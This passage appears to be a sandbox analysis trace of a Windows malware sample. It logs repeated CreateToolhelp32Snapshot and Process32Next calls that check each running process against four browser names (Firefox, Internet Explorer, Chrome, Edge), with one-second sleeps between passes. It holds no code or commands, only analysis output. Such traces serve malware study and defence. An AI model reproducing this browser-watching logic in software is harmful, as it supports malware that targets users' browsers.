lpString2="firefox.exe") returned 1 [0196.577] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0196.577] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0196.577] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0196.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0196.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0196.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0196.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0196.578] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0196.578] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0196.578] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0196.578] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0196.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0196.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0196.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0196.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0196.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0196.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0196.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0196.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0196.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0196.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0196.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0196.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0196.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0196.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0196.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0196.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0196.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0196.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0196.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0196.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0196.581] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0196.581] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0196.582] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0196.582] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0196.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0196.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0196.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.583] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.583] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.583] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.583] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0196.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0196.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0196.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0196.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.584] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.584] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.584] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.584] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0196.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0196.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0196.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.585] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.585] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.585] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.585] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.586] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.586] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.586] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.586] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0196.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0196.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0196.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0196.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0196.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0196.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.587] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.587] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.587] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.587] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.587] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.588] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.588] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.588] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.588] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.588] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.588] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0196.589] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0196.631] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0196.631] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0196.631] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0196.631] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0196.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.632] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0196.632] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0196.632] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0196.632] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0196.632] CloseHandle (hObject=0xd4) returned 1 [0196.632] Sleep (dwMilliseconds=0x3e8) [0197.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0197.679] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.679] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0197.679] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0197.679] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0197.679] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0197.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.680] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0197.680] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0197.680] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0197.680] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0197.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.680] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0197.680] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0197.680] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0197.680] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.681] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0197.681] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0197.681] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0197.681] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.681] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0197.682] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0197.682] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0197.682] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.682] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0197.682] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0197.682] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0197.682] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.683] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0197.683] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0197.683] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0197.683] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.683] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0197.683] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0197.683] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0197.683] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.684] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0197.684] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0197.684] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0197.684] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0197.684] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0197.684] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0197.685] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0197.685] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.685] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.685] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.685] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.685] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.686] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.686] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.686] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.688] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0197.688] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0197.688] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0197.688] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 